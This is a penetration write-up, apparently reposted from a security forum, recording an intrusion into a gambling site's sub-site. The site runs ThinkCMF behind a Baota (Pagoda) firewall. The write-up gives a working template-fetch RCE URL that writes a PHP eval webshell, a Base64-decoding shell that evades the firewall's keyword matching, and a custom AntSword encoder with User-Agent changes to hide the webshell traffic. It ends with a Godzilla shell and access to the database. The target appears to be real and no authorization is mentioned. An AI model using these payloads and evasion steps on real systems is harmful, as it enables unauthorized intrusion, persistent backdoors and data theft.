
Title: Record of penetrating a BC (gambling) site while bypassing the Pagoda (Baota/BT panel) firewall


0x00 Information Collection

Since the main site sits behind a cloud WAF, any test gets blocked immediately, and the preliminary test found no usable hole, so I switched to the sub-site, hoping to obtain valuable information through it.


This is a site for querying agent ("proxy") accounts. Entering admin in the URL automatically redirects to the backend.


Looking at this parameter, I guessed it might be ThinkCMF.

0x01 getshell

ThinkCMF happens to have a known RCE (the template fetch vulnerability, which lets a request render attacker-supplied template content), so it is worth a try:

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test1.php','<?php @eval($_POST[zero])?>')</php>

A white screen is a good sign; it should have succeeded.

Visiting the written file test1.php returns a blank page.

Trying the AntSword connection reports an error straight away. I guessed I might have run into a firewall.


Then I went back to the shell and manually tried a phpinfo() through it.


Sure enough, there is a Pagoda firewall.

0x02 Bypass the Pagoda Firewall

Pagoda evidently matches on certain function names in the request (the plain phpinfo() was intercepted), so the payload definitely cannot be passed as-is; the traffic has to be obfuscated so that no recognisable keyword reaches the WAF.

Try Base64-encoding the entire payload.

Since the payload now arrives Base64-encoded, the small shell (小马) has to change accordingly: it simply Base64-decodes the passed value once before eval.

The small shell is as follows:

<?php @eval(base64_decode($_POST[zero]));

phpinfo(); Base64-encoded is cGhwaW5mbygpOw==

Send it as zero=cGhwaW5mbygpOw==


As can be seen, the Pagoda firewall no longer intercepts the request: the keyword match fails on the Base64 text and the bypass succeeds.

0x03 Transformation of ant sword

We used Base64 encoding, but AntSword actually ships with its own Base64 encoder and decoder.

Try using the built-in Base64 encoder directly: the connection still fails.


Why does this happen?

Let's analyse the traffic AntSword sends.

Set AntSword's proxy to Burp.


Intercept the traffic.


Two places are obviously easy for the WAF to recognise.

First: the User-Agent header carries the keyword antSword/v2.1. This is equivalent to telling the WAF who I am, so it is the first thing to change.

Second: AntSword's request body itself still contains keywords. After the password (cmd) parameter come eval and base64_decode in plain text, with the Base64-encoded payload in a separate random parameter. Our small shell already does the Base64 decoding itself, so the default encoder not only fails to pass the WAF, it would not work even without a WAF: the shell would base64_decode the plaintext "@eval(@base64_decode(...))" stub instead of the payload and eval garbage. So we need to define the encoder ourselves.

Create a new PHP encoder.


Since we only need to Base64-encode the payload once, we can directly assign the Base64 of data['_'] to the password parameter. Whether or not random parameters are added does not matter.

The encoder is as follows:

'use strict';
/*
 * @param {String} pwd Connection password
 * @param {Array} data Payload array before encoder processing
 * @return {Array} data Payload array after encoder processing
 */
module.exports = (pwd, data, ext = {}) => {
  // Base64-encode the payload once and hand it to the shell's POST parameter
  data[pwd] = Buffer.from(data['_']).toString('base64');
  delete data['_'];
  return data;
}

Then modify the User-Agent header in AntSword's request settings to an ordinary browser value.


Apply our encoder; the decoder can be left at the default, since the shell's response is not encoded.

It is also recommended to enable the options for adding junk data and sending multipart packets, which further changes the shape of the request.


Test the connection again: it succeeds.


Then, clicking into a directory, there is still a problem: directories cannot be traversed. This can be solved with Godzilla, so upload a Godzilla shell through the connection.

Someone may ask: why not just upload the Godzilla shell directly through the ThinkCMF RCE? In practice the GET parameter has a length limit, and some characters get truncated on the way, so a full PHP file cannot be written intact that way.


There are quite a lot of websites on the server, but unfortunately not the main site; the database only holds a pile of agent accounts. A waste of time.


0x04 Summary

1. The BC target's main site had no exploitable vulnerability. On the sub-site, entering the admin directory redirects to the backend.

2. CMS fingerprinting shows the sub-site runs the ThinkCMF framework.

3. Use the RCE to write a one-line shell: http://www.xxx.com/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test1.php','<?php @eval($_POST[zero])?>')</php>

4. Visiting http://www.xxx.com/test1.php shows a blank page.

5. The AntSword connection errors out immediately; executing a POST by hand (http://www.xxx.com/test1.php with body zero=phpinfo();) shows the Pagoda firewall page.

6. Write a second one-liner through the RCE that Base64-decodes its input: http://www.xxx.com/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test2.php','<?php @eval(base64_decode($_POST[zero]));')</php>

7. Base64-encode phpinfo(); as cGhwaW5mbygpOw== and POST it (http://www.xxx.com/test2.php with body zero=cGhwaW5mbygpOw==); the request goes through normally.

8. The Pagoda firewall intercepts the AntSword User-Agent and the command-execution keywords, such as the eval and base64_decode that follow the password (cmd) parameter. The User-Agent antSword/v2.1 tells the WAF who we are, so it is the first thing to change; second, the stock traffic still carries those keywords, and our small shell already does the Base64 decoding itself.

9. Replace the default base64 encoder with:

'use strict';
/*
 * @param {String} pwd Connection password
 * @param {Array} data Payload array before encoder processing
 * @return {Array} data Payload array after encoder processing
 */
module.exports = (pwd, data, ext = {}) => {
  data[pwd] = Buffer.from(data['_']).toString('base64');
  delete data['_'];
  return data;
}

10. Change the User-Agent header in AntSword's request settings to an ordinary HTTP request value.

11. Connect with the modified AntSword and the custom encoder loaded; clicking into directories still does not work.

12. Load and modify the default base64 encoder in Godzilla the same way; it bypasses the Pagoda firewall and works normally.

Original link: https://xz.aliyun.com/t/9295
